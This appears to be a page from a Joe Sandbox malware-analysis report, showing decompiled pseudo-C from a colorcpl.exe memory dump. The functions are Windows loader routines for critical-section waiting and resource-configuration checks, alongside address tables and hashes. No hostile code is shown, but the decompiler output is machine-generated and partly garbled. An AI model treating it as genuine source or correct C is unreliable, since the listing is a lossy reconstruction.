0x00000000
0x00000000
0x00000000
0x00000000
0x043d37a7
0x043d3795
0x043d3760
0x043d3760
0x043d3760
0x043d3765
0x043d3765
0x043d376b
0x043d39aa
0x043d39ac
0x043d39b9
0x043d39be
0x043d39be
0x043d39cb
0x043d3bed
0x043d39d1
0x043d39da
0x043d39df
0x043d39df
0x043d3bf5
0x043d3bfe
0x043d3c09
0x043d3c0f
0x043d3c0f
0x043d3c1e
0x043d3c1e
0x043d3c23
0x043d3c23
0x043d375e
0x043d374c
0x043d372a
0x043d3c25
0x043d3c28
0x043d3c34

Strings

LdrpResSearchResourceHandle Enter, xrefs: 043D3666
LdrpResSearchResourceHandle Exit, xrefs: 043D3681
PE, xrefs: 043D37D2

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 262a5a991b5b112ffb85bbd06a080386337548638572977a6f329ff86455ee9d
Instruction ID: df833c1caa62639fb84f2870d22462b6c0aed60817e2a2cd51c5e613d42ab520
Opcode Fuzzy Hash: 262a5a991b5b112ffb85bbd06a080386337548638572977a6f329ff86455ee9d
Instruction Fuzzy Hash: 09F1A4B6A016288BDB70DF14DC80BE9B3B5EF44714F04A0E9DD09A7650E731AE85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0436F4D0 Relevance: 4.1, Strings: 3, Instructions: 382
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0436F4D0(signed int __ecx, signed char __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char _v72;
				signed int _v76;
				char _v80;
				void* _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				void* _v100;
				signed int _v104;
				char _v108;
				signed char _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				char _v129;
				char _v130;
				intOrPtr _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				signed int _t132;
				signed int _t134;
				signed char* _t138;
				signed char* _t139;
				signed char* _t140;
				void* _t142;
				signed int _t144;
				signed int _t145;
				void* _t152;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t191;
				signed char* _t192;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t206;
				unsigned int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				intOrPtr _t218;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				intOrPtr _t229;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t238;
				signed char _t241;
				void* _t244;
				signed int _t246;
				intOrPtr _t247;
				void* _t251;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t234 = __edx;
				_t209 = __ecx;
				_t254 = (_t252 & 0xfffffff8) - 0x84;
				_v8 =  *0x443b370 ^ _t254;
				_t129 =  *[fs:0x18];
				_t241 = __ecx;
				_v112 = __edx;
				_v72 = __ecx;
				_v129 = 0;
				_v64 = _t129;
				_v108 = 0;
				if(__ecx == 0x4433390) {
					_v129 = 1;
					 *((intOrPtr*)(_t129 + 0xf84)) = 1;
				}
				if( *0x4435da8 != 0) {
					_push(0xc000004b);
					_push(0xffffffff);
					E04382C70();
				}
				if( *0x4435a84 == 0) {
					_v120 = 0x4435a88;
				} else {
					_v120 = 0;
				}
				_t246 = _t241 + 0x10;
				if( *(_t241 + 0x10) == 0) {
					_t210 = _t209 | 0xffffffff;
					__eflags =  *0x4434ae2;
					_v124 = _t210;
					if( *0x4434ae2 != 0) {
						_push(0);
						_push(1);
						_push(0);
						_push(0x100003);
						_push( &_v124);
						_t132 = E04382E30();
						__eflags = _t132;
						if(_t132 >= 0) {
							_t211 = _v124;
						} else {
							_t211 = _t210 | 0xffffffff;
							_v124 = _t210 | 0xffffffff;
						}
					}
					asm("lock cmpxchg [esi], ecx");
					__eflags = 0;
					if(0 != 0) {
						_t198 = _v124;
						__eflags = _t198 - 0xffffffff;
						if(_t198 != 0xffffffff) {
							_push(_t198);
							E04382A80();
						}
					}
				}
				_t134 =  *_t241;
				if(_t134 == 0xffffffff) {
					_t134 = _t134 | 0xffffffff;
					__eflags =  *(_t241 + 0x14) & 0x01000000;
					if(( *(_t241 + 0x14) & 0x01000000) == 0) {
						_t211 = _t241;
						E0436FCE0(_t241, _t234);
						_t134 =  *_t241;
					}
				}
				_v104 = 0;
				if(_t134 != 0xffffffff) {
					 *((intOrPtr*)(_t134 + 0x14)) =  *((intOrPtr*)(_t134 + 0x14)) + 1;
				}
				_t201 =  *_t246;
				_v68 = _t201;
				L9:
				while(1) {
					L9:
					if(E04353C40() != 0) {
						_t138 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t138 = 0x7ffe0382;
					}
					if( *_t138 != 0) {
						_t139 =  *[fs:0x30];
						__eflags = _t139[0x240] & 0x00000002;
						if((_t139[0x240] & 0x00000002) != 0) {
							_v16 = _t241;
							_v54 = 0x1722;
							_v24 =  *(_t241 + 0x14) & 0x00ffffff;
							_v28 =  *(_t241 + 4);
							_v20 =  *((intOrPtr*)(_t241 + 0xc));
							_t191 = ( *[fs:0x30])[0x50];
							__eflags = _t191;
							if(_t191 == 0) {
								L61:
								_t192 = 0x7ffe0382;
							} else {
								__eflags =  *_t191;
								if( *_t191 == 0) {
									goto L61;
								} else {
									_t192 = ( *[fs:0x30])[0x50] + 0x228;
								}
							}
							_t211 =  &_v60;
							_push( &_v60);
							_push(0x10);
							_push(0x20402);
							_push( *_t192 & 0x000000ff);
							E04382F90();
						}
						goto L12;
						L24:
						if(_t140 < 0) {
							L04398AA0(_t211, _t234, _t140);
							asm("int3");
							__eflags = _t246 != 4;
							if(_t246 != 4) {
								L47:
								E0436F946(_v132,  &_v124);
								_t152 = 0;
							} else {
								_t238 =  *(_t241 + 4);
								_t153 =  *_t241;
								asm("lock cmpxchg8b [esi]");
								__eflags = _t153 -  *_t241;
								if(_t153 !=  *_t241) {
									goto L47;
								} else {
									__eflags = _t238 -  *(_t241 + 4);
									if(__eflags != 0) {
										goto L47;
									} else {
										_t152 = L0436F8A5(_v132,  &_v124, _a8, _a12);
									}
								}
							}
							return _t152;
						} else {
							if(_v129 != 0) {
								 *((intOrPtr*)(_v64 + 0xf84)) = 0;
								_t156 = ( *[fs:0x30])[0x50];
								__eflags = _t156;
								if(_t156 == 0) {
									L81:
									_t140 = 0x7ffe0384;
								} else {
									__eflags =  *_t156;
									if( *_t156 == 0) {
										goto L81;
									} else {
										_t140 = ( *[fs:0x30])[0x50] + 0x22a;
									}
								}
								__eflags =  *_t140;
								if( *_t140 != 0) {
									_t140 =  *[fs:0x30];
									__eflags = _t140[0x240] & 0x00000004;
									if((_t140[0x240] & 0x00000004) != 0) {
										_t159 = ( *[fs:0x30])[0x50];
										__eflags = _t159;
										if(_t159 == 0) {
											L87:
											_t140 = 0x7ffe0385;
										} else {
											__eflags =  *_t159;
											if( *_t159 == 0) {
												goto L87;
											} else {
												_t140 = ( *[fs:0x30])[0x50] + 0x22b;
											}
										}
										__eflags =  *_t140 & 0x00000020;
										if(( *_t140 & 0x00000020) != 0) {
											_t140 = E043C0227(0x1483, _t234, 0xffffffff, 0xffffffff, 0, 0);
										}
									}
								}
							}
							_pop(_t244);
							_pop(_t251);
							_pop(_t206);
							return E04384B50(_t140, _t206, _v8 ^ _t254, _t234, _t244, _t251);
						}
					}
					L12:
					if(_t201 != 0xffffffff) {
						_push(_v120);
						_push(0);
						_push(_t201);
						_t140 = E043829D0();
					} else {
						_t207 = _t241 + 4;
						_v76 =  &_v100 & 0xfffffffc;
						do {
							_t218 =  *[fs:0x18];
							_v100 = _t207;
							_v80 = 1;
							_v88 = 0;
							_v92 = 0;
							_v84 = 0;
							_v96 =  *((intOrPtr*)(_t218 + 0x24));
							_t208 = _v76;
							_t220 =  *((intOrPtr*)(_t218 + 0x30)) + 0x25c;
							_t169 = _t207 >> 0x00000005 & 0x0000007f;
							_v116 = _t220;
							_t235 =  *(_t220 + _t169 * 4);
							_v128 = _t220 + _t169 * 4;
							while(1) {
								_t172 = _t235 & 0xfffffffc;
								_t223 = _t235 & 0x00000003 | _t208;
								_v92 = _t172;
								if(_t172 != 0) {
									_v84 = 0;
									_t223 = _t223 | 0x00000002;
								} else {
									_v84 =  &_v100;
								}
								_t246 = _t223;
								_t173 = _t235;
								asm("lock cmpxchg [edi], esi");
								if(_t173 == _t235) {
									break;
								}
								_t235 = _t173;
							}
							_t241 = _v72;
							_t207 = _t241 + 4;
							if(((_t223 ^ _t235) & 0x00000002) != 0) {
								_t246 = _v128;
								_t236 =  *_t246;
								while(1) {
									_t226 = _t236 & 0xfffffffc;
									__eflags =  *(_t226 + 0x10);
									_v128 = _t226 + 0x10;
									if( *(_t226 + 0x10) == 0) {
										goto L31;
									}
									do {
										L31:
										_t183 = _t226;
										_t226 =  *(_t226 + 8);
										 *(_t226 + 0xc) = _t183;
										__eflags =  *(_t226 + 0x10);
									} while ( *(_t226 + 0x10) == 0);
									L32:
									 *_v128 =  *(_t226 + 0x10);
									__eflags = _t236 & 0x00000001;
									if((_t236 & 0x00000001) != 0) {
										_v130 = 1;
									} else {
										_v130 = 0;
										__eflags = _t236 & 0xfffffffc;
									}
									_t176 = _t236;
									asm("lock cmpxchg [esi], ecx");
									__eflags = _t176 - _t236;
									if(_t176 != _t236) {
										_t236 = _t176;
										_t226 = _t236 & 0xfffffffc;
										__eflags =  *(_t226 + 0x10);
										_v128 = _t226 + 0x10;
										if( *(_t226 + 0x10) == 0) {
											goto L31;
										}
										goto L32;
									}
									__eflags = _v130;
									if(_v130 != 0) {
										_t179 = _t176 & 0xfffffffc;
										__eflags = _t179;
										_v128 = _t179;
										if(_t179 != 0) {
											do {
												_t246 =  *(_t179 + 8);
												_t180 = _t179 + 0x14;
												 *_t180 = 2;
												__eflags =  *_t180;
												if( *_t180 == 0) {
													_push( *((intOrPtr*)(_v128 + 4)));
													E043830B0();
												}
												_t179 = _t246;
												_v128 = _t179;
												__eflags = _t246;
											} while (_t246 != 0);
										}
									}
									goto L19;
								}
							}
							L19:
							_t234 =  &_v100;
							_t229 = _v116;
							if( *_t207 != _v112) {
								E0436F946(_t229, _t234);
								_t140 = 0;
							} else {
								_t140 = L0436F8A5(_t229, _t234, _v120, 0);
							}
							if(_t140 == 0x102) {
								L70:
								_t202 = _v108;
								_t247 =  *[fs:0x18];
								_push(_t202);
								_t142 = E04386310( *_v120,  *((intOrPtr*)(_v120 + 4)), 0xff676980, 0xffffffff);
								_push(_t234);
								E043CEF10(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t142);
								_t144 =  *_t241;
								_t255 = _t254 + 0x18;
								__eflags = _t144 - 0xffffffff;
								if(_t144 == 0xffffffff) {
									_t145 = 0;
									__eflags = 0;
								} else {
									_t145 =  *((intOrPtr*)(_t144 + 0x14));
								}
								_push(_t145);
								_push(_t241);
								_push( *((intOrPtr*)(_t241 + 0xc)));
								_push( *((intOrPtr*)(_t247 + 0x24)));
								E043CEF10(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t247 + 0x20)));
								_t256 = _t255 + 0x20;
								_t203 = _t202 + 1;
								_t211 = _t241;
								_v108 = _t203;
								_t246 = E043DA9AE(_t241);
								__eflags = _t203 - 2;
								if(_t203 > 2) {
									__eflags = _t241 - 0x4433390;
									if(_t241 != 0x4433390) {
										__eflags = _t246 - _v104;
										if(_t246 == _v104) {
											E043DAB5E(_t211);
										}
									}
								}
								_push("RTL: Re-Waiting\n");
								_push(0);
								_push(0x65);
								_v104 = _t246;
								E043CEF10();
								_t201 = _v68;
								_t254 = _t256 + 0xc;
								goto L9;
							} else {
								goto L22;
							}
							goto L23;
							L22:
							_t211 =  *_t207;
							_v112 = _t211;
						} while ((_t211 & 0x00000002) != 0);
					}
					L23:
					if(_t140 == 0x102) {
						goto L70;
					}
					goto L24;
				}
			}

0x0436f4d0
0x0436f4d0
0x0436f4d8
0x0436f4e5
0x0436f4ec
0x0436f4f5
0x0436f4f7
0x0436f4fb
0x0436f4ff
0x0436f504
0x0436f508
0x0436f516
0x043aff46
0x043aff4b
0x043aff4b
0x0436f523
0x043aff5a
0x043aff5f
0x043aff61
0x043aff61
0x0436f530
0x043aff6b
0x0436f536
0x0436f536
0x0436f536
0x0436f542
0x0436f545
0x0436f722
0x0436f725
0x0436f72c
0x0436f730
0x043aff78
0x043aff7a
0x043aff7c
0x043aff7e
0x043aff87
0x043aff88
0x043aff8d
0x043aff8f
0x043aff9d
0x043aff91
0x043aff91
0x043aff94
0x043aff94
0x043aff8f
0x0436f738
0x0436f73c
0x0436f73e
0x043affa6
0x043affaa
0x043affad
0x043affb3
0x043affb4
0x043affb4
0x043affad
0x0436f73e
0x0436f54b
0x0436f550
0x0436f749
0x0436f74c
0x0436f753
0x0436f759
0x0436f75b
0x0436f760
0x0436f760
0x0436f753
0x0436f556
0x0436f561
0x0436f563
0x0436f563
0x0436f566
0x0436f568
0x00000000
0x0436f570
0x0436f570
0x0436f577
0x043affc7
0x0436f57d
0x0436f57d
0x0436f57d
0x0436f585
0x043affd1
0x043affd7
0x043affde
0x043affe9
0x043afff0
0x043afffd
0x043b0004
0x043b000b
0x043b0018
0x043b001b
0x043b001d
0x043b0034
0x043b0034
0x043b001f
0x043b001f
0x043b0022
0x00000000
0x043b0024
0x043b002d
0x043b002d
0x043b0022
0x043b003c
0x043b0040
0x043b0041
0x043b0043
0x043b0048
0x043b0049
0x043b0049
0x00000000
0x0436f682
0x0436f684
0x043b01e2
0x043b01e7
0x043b01e8
0x043b01eb
0x0436f825
0x0436f82d
0x0436f832
0x043b01f1
0x043b01f4
0x043b01f6
0x043b01ff
0x043b0203
0x043b0205
0x00000000
0x043b020b
0x043b020b
0x0436f807
0x00000000
0x0436f809
0x0436f817
0x0436f817
0x0436f807
0x043b0205
0x0436f822
0x0436f68a
0x0436f68f
0x043b014a
0x043b015a
0x043b015d
0x043b015f
0x043b0176
0x043b0176
0x043b0161
0x043b0161
0x043b0164
0x00000000
0x043b0166
0x043b016f
0x043b016f
0x043b0164
0x043b017b
0x043b017e
0x043b0184
0x043b018a
0x043b0191
0x043b019d
0x043b01a0
0x043b01a2
0x043b01b9
0x043b01b9
0x043b01a4
0x043b01a4
0x043b01a7
0x00000000
0x043b01a9
0x043b01b2
0x043b01b2
0x043b01a7
0x043b01be
0x043b01c1
0x043b01d7
0x043b01d7
0x043b01c1
0x043b0191
0x043b017e
0x0436f69c
0x0436f69d
0x0436f69e
0x0436f6a9
0x0436f6a9
0x0436f684
0x0436f58b
0x0436f58e
0x043b0093
0x043b0097
0x043b0099
0x043b009a
0x0436f594
0x0436f59b
0x0436f59e
0x0436f5a2
0x0436f5a2
0x0436f5a9
0x0436f5ad
0x0436f5b5
0x0436f5bd
0x0436f5c5
0x0436f5d0
0x0436f5d9
0x0436f5dd
0x0436f5e6
0x0436f5e9
0x0436f5ed
0x0436f5f3
0x0436f600
0x0436f607
0x0436f60a
0x0436f60c
0x0436f612
0x0436f6b3
0x0436f6bb
0x0436f618
0x0436f61c
0x0436f61c
0x0436f620
0x0436f622
0x0436f624
0x0436f62a
0x00000000
0x00000000
0x043b0053
0x043b0053
0x0436f630
0x0436f636
0x0436f63c
0x0436f6c3
0x0436f6c7
0x0436f6d0
0x0436f6d2
0x0436f6d5
0x0436f6dc
0x0436f6e0
0x00000000
0x00000000
0x0436f6e2
0x0436f6e2
0x0436f6e2
0x0436f6e4
0x0436f6e7
0x0436f6ea
0x0436f6ea
0x0436f6f0
0x0436f6f7
0x0436f6f9
0x0436f6fc
0x0436f767
0x0436f6fe
0x0436f700
0x0436f705
0x0436f705
0x0436f708
0x0436f70a
0x0436f70e
0x0436f710
0x0436f770
0x0436f6d2
0x0436f6d5
0x0436f6dc
0x0436f6e0
0x00000000
0x00000000
0x00000000
0x0436f6e0
0x0436f712
0x0436f717
0x043b005a
0x043b005a
0x043b005d
0x043b0061
0x043b0067
0x043b0067
0x043b006f
0x043b0072
0x043b0074
0x043b0076
0x043b007c
0x043b007f
0x043b007f
0x043b0084
0x043b0086
0x043b008a
0x043b008a
0x043b008e
0x043b0061
0x00000000
0x0436f717
0x0436f6d0
0x0436f642
0x0436f644
0x0436f648
0x0436f650
0x0436f6aa
0x0436f6af
0x0436f652
0x0436f658
0x0436f658
0x0436f662
0x043b00a4
0x043b00a4
0x043b00ac
0x043b00b3
0x043b00c0
0x043b00c5
0x043b00d0
0x043b00d5
0x043b00d7
0x043b00da
0x043b00dd
0x043b00e4
0x043b00e4
0x043b00df
0x043b00df
0x043b00df
0x043b00e6
0x043b00e7
0x043b00e8
0x043b00eb
0x043b00fa
0x043b00ff
0x043b0102
0x043b0103
0x043b0105
0x043b010e
0x043b0110
0x043b0113
0x043b0115
0x043b011b
0x043b011d
0x043b0121
0x043b0123
0x043b0123
0x043b0121
0x043b011b
0x043b0128
0x043b012d
0x043b012f
0x043b0131
0x043b0135
0x043b013a
0x043b013e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0436f668
0x0436f668
0x0436f66a
0x0436f66e
0x0436f5a2
0x0436f677
0x0436f67c
0x00000000
0x00000000
0x00000000
0x0436f67c

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 043B00F1
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 043B00C7
RTL: Re-Waiting, xrefs: 043B0128

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 49a69b45fb6180c2ba507ff20814005a6572e55f0516fa1ab7f78fab636d2135
Instruction ID: d7f73663b738c31319e4a154c92b53990e4e27adebd08fb5a3ae00326ec633f9
Opcode Fuzzy Hash: 49a69b45fb6180c2ba507ff20814005a6572e55f0516fa1ab7f78fab636d2135
Instruction Fuzzy Hash: 98E1C130604B429FE725CF28D844B6AB7E1BF88318F145A5DF5A68B6E0D774F944CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0434B5E0 Relevance: 4.1, Strings: 3, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0434B5E0(void* __ebx, void* __edi, signed int __esi, void* __eflags) {
				short _t100;
				short _t101;
				signed int* _t107;
				signed char* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed char* _t114;
				signed int _t115;
				signed int _t117;
				signed int _t125;
				void* _t129;
				void* _t131;
				void* _t133;
				void* _t135;
				void* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t150;
				short _t158;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				signed int _t201;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				void* _t209;

				_push(0x48);
				_push(0x441bfb0);
				E04397C40(__ebx, __edi, __esi);
				_t185 =  *(_t209 + 8);
				 *(_t209 - 0x34) = _t185;
				 *(_t209 - 0x40) =  *(_t209 + 0x10);
				 *((intOrPtr*)(_t209 - 0x28)) = L"MUI";
				 *((intOrPtr*)(_t209 - 0x24)) = 1;
				 *((intOrPtr*)(_t209 - 0x20)) = 0;
				 *(_t209 - 0x38) =  *(_t209 + 0xc);
				 *(_t209 - 0x30) = 0;
				_t158 = 0x2e;
				 *((short*)(_t209 - 0x50)) = _t158;
				_t100 = 0x30;
				 *((short*)(_t209 - 0x4e)) = _t100;
				 *(_t209 - 0x4c) = L"LdrResGetRCConfig Enter";
				_t101 = 0x2c;
				 *((short*)(_t209 - 0x58)) = _t101;
				 *((short*)(_t209 - 0x56)) = _t158;
				 *(_t209 - 0x54) = L"LdrResGetRCConfig Exit";
				 *(_t209 - 0x3c) =  *(_t209 + 0x14) & 0x00002000;
				asm("sbb esi, esi");
				_t205 = (__esi & 0x00001000) + 0x1000;
				_t107 =  *( *[fs:0x30] + 0x50);
				if(_t107 != 0) {
					__eflags =  *_t107;
					if( *_t107 == 0) {
						goto L1;
					}
					_t108 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t108 & 0x00000001) != 0) {
						_t109 = E04353C40();
						_t198 = 0x7ffe0384;
						__eflags = _t109;
						if(_t109 == 0) {
							_t110 = 0x7ffe0384;
						} else {
							_t110 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E043CFC01(_t209 - 0x50,  *_t110 & 0x000000ff);
						_t185 =  *(_t209 - 0x34);
					} else {
						_t198 = 0x7ffe0384;
					}
					if(_t185 == 0) {
						 *(_t209 - 0x2c) = 0xc000000d;
						goto L8;
					} else {
						if( *((intOrPtr*)(_t209 + 0x18)) == 0) {
							L17:
							__eflags =  *(_t209 + 0xc);
							if( *(_t209 + 0xc) == 0) {
								__eflags =  *(_t209 - 0x3c);
								if(__eflags != 0) {
									goto L18;
								}
								_push(0);
								_push( *(_t209 + 0x14));
								_push(_t209 - 0x38);
								_push(_t185);
								_t117 = E0434AB70(0, _t198, _t205, __eflags);
								__eflags = _t117;
								if(_t117 >= 0) {
									goto L18;
								}
								L12:
								 *[fs:0x0] =  *((intOrPtr*)(_t209 - 0x10));
								return _t117;
							}
							L18:
							_t201 = E0434AD00( *(_t209 - 0x34),  *(_t209 - 0x38), _t205 | 0x00200030, _t209 - 0x28, 3, _t209 - 0x30, _t209 - 0x44, 0, 0);
							 *(_t209 - 0x2c) = _t201;
							__eflags = _t201;
							if(_t201 >= 0) {
								 *((intOrPtr*)(_t209 - 4)) = 0;
								_t208 =  *(_t209 - 0x30);
								__eflags =  *(_t209 - 0x3c);
								if( *(_t209 - 0x3c) != 0) {
									L56:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									_t125 =  *(_t209 - 0x40);
									__eflags = _t125;
									if(_t125 != 0) {
										 *_t125 = _t208;
									}
									_t202 = 0;
									 *(_t209 - 0x2c) = 0;
									L23:
									__eflags =  *((char*)(_t209 + 0x18));
									if( *((char*)(_t209 + 0x18)) != 0) {
										__eflags = _t208;
										if(_t208 == 0) {
											_t208 = _t208 | 0xffffffff;
											__eflags = _t208;
										}
										_push(0);
										_push(_t202);
										_push(2);
										_push(0);
										_push(_t208);
										_push(0);
										__eflags = 0;
										E043493A6(0,  *(_t209 - 0x34), 0, _t202, _t208, 0);
									}
									_t198 = 0x7ffe0384;
									L8:
									_t113 =  *( *[fs:0x30] + 0x50);
									if(_t113 != 0) {
										__eflags =  *_t113;
										if( *_t113 == 0) {
											goto L9;
										}
										_t114 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										L10:
										if(( *_t114 & 0x00000001) != 0) {
											_t115 = E04353C40();
											__eflags = _t115;
											if(_t115 != 0) {
												_t198 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
												__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											}
											E043CFC01(_t209 - 0x58,  *_t198 & 0x000000ff);
										}
										_t117 =  *(_t209 - 0x2c);
										goto L12;
									}
									L9:
									_t114 = 0x7ffe0385;
									goto L10;
								}
								_t190 =  *((intOrPtr*)(_t208 + 4));
								__eflags = _t190 + _t208 - ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38);
								if(_t190 + _t208 > ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38)) {
									_t202 = 0xc000007b;
									 *(_t209 - 0x2c) = 0xc000007b;
									L70:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									L21:
									__eflags = _t202;
									if(_t202 >= 0) {
										_t208 =  *(_t209 - 0x30);
									} else {
										_t208 = 0;
										 *(_t209 - 0x30) = 0;
									}
									goto L23;
								}
								_t202 = 0xc00b0003;
								 *(_t209 - 0x2c) = 0xc00b0003;
								_t168 =  *((intOrPtr*)(_t208 + 0x44));
								_t129 =  *((intOrPtr*)(_t208 + 0x48)) + _t168;
								__eflags = _t129 - _t190;
								if(_t129 > _t190) {
									goto L70;
								}
								__eflags = _t129 - _t168;
								if(_t129 < _t168) {
									goto L70;
								}
								_t169 =  *((intOrPtr*)(_t208 + 0x4c));
								_t131 =  *((intOrPtr*)(_t208 + 0x50)) + _t169;
								__eflags = _t131 - _t190;
								if(_t131 > _t190) {
									goto L70;
								}
								__eflags = _t131 - _t169;
								if(_t131 < _t169) {
									goto L70;
								}
								_t170 =  *((intOrPtr*)(_t208 + 0x54));
								_t133 =  *((intOrPtr*)(_t208 + 0x58)) + _t170;
								__eflags = _t133 - _t190;
								if(_t133 > _t190) {
									goto L70;
								}
								__eflags = _t133 - _t170;
								if(_t133 < _t170) {
									goto L70;
								}
								_t171 =  *((intOrPtr*)(_t208 + 0x5c));
								_t135 =  *((intOrPtr*)(_t208 + 0x60)) + _t171;
								__eflags = _t135 - _t190;
								if(_t135 > _t190) {
									goto L70;
								}
								__eflags = _t135 - _t171;
								if(_t135 < _t171) {
									goto L70;
								}
								_t172 =  *((intOrPtr*)(_t208 + 0x64));
								_t137 =  *((intOrPtr*)(_t208 + 0x68)) + _t172;
								__eflags = _t137 - _t190;
								if(_t137 > _t190) {
									goto L70;
								}
								__eflags = _t137 - _t172;
								if(_t137 < _t172) {
									goto L70;
								}
								_t173 =  *((intOrPtr*)(_t208 + 0x6c));
								_t139 =  *((intOrPtr*)(_t208 + 0x70)) + _t173;
								__eflags = _t139 - _t190;
								if(_t139 > _t190) {
									goto L70;
								}
								__eflags = _t139 - _t173;
								if(_t139 < _t173) {
									goto L70;
								}
								_t174 =  *((intOrPtr*)(_t208 + 0x74));
								_t141 =  *((intOrPtr*)(_t208 + 0x78)) + _t174;
								__eflags = _t141 - _t190;
								if(_t141 > _t190) {
									goto L70;
								}
								__eflags = _t141 - _t174;
								if(_t141 < _t174) {
									goto L70;
								}
								_t175 =  *((intOrPtr*)(_t208 + 0x7c));
								_t143 =  *((intOrPtr*)(_t208 + 0x80)) + _t175;
								__eflags = _t143 - _t190;
								if(_t143 > _t190) {
									goto L70;
								}
								__eflags = _t143 - _t175;
								if(_t143 < _t175) {
									goto L70;
								}
								__eflags =  *_t208 - 0xfecdfecd;
								if( *_t208 != 0xfecdfecd) {
									goto L70;
								}
								__eflags = _t190 -  *((intOrPtr*)(_t209 - 0x44));
								if(_t190 !=  *((intOrPtr*)(_t209 - 0x44))) {
									goto L70;
								}
								__eflags =  *((intOrPtr*)(_t208 + 8)) - 0x10000;
								if( *((intOrPtr*)(_t208 + 8)) != 0x10000) {
									goto L70;
								}
								_t176 =  *(_t208 + 0xc);
								__eflags =  *(_t208 + 0xc);
								if( *(_t208 + 0xc) != 0) {
									_t191 = 7;
									_t144 = E0437B95A(_t176, _t191);
									__eflags = _t144;
									if(_t144 == 0) {
										goto L70;
									}
								}
								_t192 = 3;
								_t145 = E0437B95A( *(_t208 + 0x10) & 0xffffffcf, _t192);
								__eflags = _t145;
								if(_t145 == 0) {
									goto L70;
								}
								_t193 = 0x30;
								_t146 = E0437B95A( *(_t208 + 0x10) & 0xfffffffc, _t193);
								__eflags = _t146;
								if(_t146 == 0) {
									goto L70;
								}
								__eflags =  *(_t208 + 0x10) & 0x00000001;
								if(( *(_t208 + 0x10) & 0x00000001) == 0) {
									L55:
									 *(_t209 - 0x2c) = 0;
									goto L56;
								}
								_t194 = 3;
								_t147 = E0437B95A( *((intOrPtr*)(_t208 + 0x18)), _t194);
								__eflags = _t147;
								if(_t147 == 0) {
									goto L70;
								}
								_t182 =  *(_t208 + 0x14);
								__eflags =  *(_t208 + 0x14);
								if( *(_t208 + 0x14) != 0) {
									_t148 = E0437B95A(_t182, 0x100);
									__eflags = _t148;
									if(_t148 == 0) {
										goto L70;
									}
								}
								goto L55;
							}
							__eflags = _t201 - 0xc000007b;
							if(_t201 != 0xc000007b) {
								_t202 = 0xc000008a;
								 *(_t209 - 0x2c) = 0xc000008a;
							}
							goto L21;
						}
						_t150 = E0434D530( *(_t209 - 0x34), 0, 0, 8);
						 *(_t209 - 0x30) = _t150;
						if(_t150 != 0xffffffff) {
							__eflags = _t150;
							if(_t150 == 0) {
								_t185 =  *(_t209 - 0x34);
								goto L17;
							} else {
